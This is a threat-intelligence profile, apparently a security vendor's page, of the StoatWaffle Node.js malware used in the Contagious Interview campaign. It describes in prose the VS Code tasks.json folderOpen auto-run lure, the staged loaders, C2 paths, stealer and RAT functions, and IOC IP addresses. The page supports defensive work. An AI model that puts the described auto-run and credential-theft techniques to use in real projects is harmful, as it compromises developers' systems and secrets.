StoatWaffle
StoatWaffle is a modular Node.js malware family used by the North Korea-linked threat actor tracked as WaterPlum, also known as Team 8, Moralis, and the Modilus family, as part of the Contagious Interview campaign. Public reporting states the malware began being used around December 2025 and is distributed through malicious Microsoft Visual Studio Code projects that abuse .vscode/tasks.json auto-run functionality, specifically the runOn: folderOpen option, so code executes when a victim opens and trusts a repository. The lures are described as blockchain- or developer-themed projects, including fake job interview scenarios targeting developers, especially personnel with access to source code and sensitive systems.
The infection chain is multi-stage. A malicious VS Code task downloads and executes a script, including from Vercel-hosted infrastructure, checks whether Node.js is installed, installs it from the official site if necessary, and launches an initial loader such as env.npl. That loader polls a command-and-control server at regular intervals, executes received Node.js code, and launches a second downloader that retrieves the main StoatWaffle modules.
Reported StoatWaffle functionality includes at least two primary modules: an information stealer and a remote access trojan (RAT). The stealer module targets credentials and data from Chromium-based browsers and Mozilla Firefox, including browser extension data. In Firefox environments it reads extensions.json and checks extension names for designated keywords. On macOS, reporting states it steals Keychain or iCloud Keychain database data. It also copies stolen data to a temporary directory and uploads it to the C2 server. The malware can detect when it is running inside Windows Subsystem for Linux and access Windows user data from WSL. Reporting also notes collection of installed software information.
The RAT module maintains communication with attacker-controlled C2 infrastructure and supports remote operations including listing files and directories, retrieving directory details, changing the working directory, navigating to the application directory, recursively searching directories, uploading files, listing or uploading files matching keywords, executing arbitrary shell commands, executing arbitrary Node.js code, and terminating its own process.
High-confidence infrastructure indicators reported in the content include the IP addresses 185.163.125.196, 147.124.202.208, 163.245.194.216, 66.235.168.136, and 87.236.177.9.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The malware, dubbed StoatWaffle, has been attributed to a group tracked as WaterPlum, also known as Team 8, Moralis, or the Modilus family. The malware is a modular implant written in Node.js and includes capabilities for stealing credentials and providing remote access to compromised systems.
The malware, dubbed StoatWaffle, has been attributed to a group tracked as WaterPlum, also known as Team 8, Moralis, or the Modilus family. The malware is a modular implant written in Node.js and includes capabilities for stealing credentials and providing remote access to compromised systems.
The malware, dubbed StoatWaffle, has been attributed to a group tracked as WaterPlum, also known as Team 8, Moralis, or the Modilus family. The malware is a modular implant written in Node.js and includes capabilities for stealing credentials and providing remote access to compromised systems.
The malware, dubbed StoatWaffle, has been attributed to a group tracked as WaterPlum, also known as Team 8, Moralis, or the Modilus family. The malware is a modular implant written in Node.js and includes capabilities for stealing credentials and providing remote access to compromised systems.
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueTeam 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode directory that contains tasks.json file. If a user opens and trusts this malicious reporitory with VSCode, it reads this tasks.json file.
Execution
5 techniquesThe RAT Module... include[s] the ability to list files, execute shell commands, upload files, and run arbitrary Node.js code.
This task downloads and executes a batch file from a web application hosted on Vercel.
The malware is a modular implant written in Node.js... When it receives a response, it executes the embedded Node.js code, which launches a second downloader.
This file uses the runOn: folderOpen option, which instructs VS Code to execute a defined task as soon as the folder is opened and trusted by the user.
The attack begins when a developer opens a malicious repository, disguised as a blockchain-related project, in VS Code. The project contains a .vscode directory with a specially crafted tasks.json file.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
1 techniqueCredential Access
5 techniquesStealer Module: This component is designed to exfiltrate credentials and data from Chromium-based browsers and Mozilla Firefox. It also targets browser extension data.
Stealer Module: This component is designed to exfiltrate credentials and data from Chromium-based browsers and Mozilla Firefox.
If the victim OS was macOS, it also steals Keychain database.
Stealer module thefts credentials stored on Web browsers and designated browser extension data and uploads them to C2 server.
If the victim OS was macOS, it also steals Keychain database.
Discovery
5 techniquesOne module acts as a stealer, collecting credentials from browsers, extension data, installed software details...
The RAT Module... include[s] the ability to list files, execute shell commands, upload files, and run arbitrary Node.js code.
If the victim browser was Firefox, it steals browser extension data besides stored credentials. It reads extensions.json and gets the list of browser extension names, then checks whether the designated keyword is included.
The stealer can also detect if it is running in a Windows Subsystem for Linux (WSL) environment and access Windows user data from within the Linux instance.
This initial script checks if Node.js is installed on the victim’s system and, if not, downloads and installs it from the official website.
Collection
1 techniqueOn macOS systems, the module additionally steals the iCloud Keychain database. The stolen data is copied to a temporary directory and uploaded to the C2 server.
Command and Control
4 techniquesThe RAT module maintains regular communication with an attacker-controlled C2 server, executing commands to terminate its own process, change the working directory, list files and directories, navigate to the application directory, retrieve directory details, upload a file, execute Node.js code, and run arbitrary shell commands, among others.
env.nplは、StoatWaffleの1段目のダウンローダです。C2サーバの /api/errorMessage に対して5秒間隔で接続し... 2段目のダウンローダは、... /api/handleErrors というパスに対して5秒おきに接続します。... RATモジュールは、C2サーバと定期的に通信を行い、`/api/hsocketNext` からコマンドを受信した場合はそれを実行し、結果を /api/hsocketResult に送信します。
This task downloads and executes a batch file from a web application hosted on Vercel... It then fetches and runs env.npl, the initial loader for the StoatWaffle malware.
Another module works as a remote access trojan (RAT), allowing attackers to run commands on the infected system and receive results.
Exfiltration
2 techniquesThe stolen data is copied to a temporary directory and uploaded to the C2 server.
newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A modular Node.js malware family delivered via malicious VS Code projects abusing auto-run tasks.json. It uses a multi-stage infection chain with a loader/downloader, a credential and browser-extension data stealer, and a RAT module for remote command execution. It can steal macOS Keychain data and access Windows data through WSL environments.
StoatWaffle is a malware family with RAT and credential-stealing functionality. It communicates with a C2 server, executes commands, uploads files, runs Node.js and shell commands, steals stored browser credentials and browser extension data from Chromium and Firefox, and targets macOS Keychain databases.
A modular Node.js malware family distributed through malicious VS Code projects. It uses auto-run tasks to download payloads, install Node.js if needed, launch staged downloaders, and deploy stealer and RAT modules. The stealer targets browser credentials, extension data, and on macOS the iCloud Keychain database; the RAT executes commands, uploads files, searches directories, and runs shell or Node.js code.
Named as malware used in the Contagious Interview campaign.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.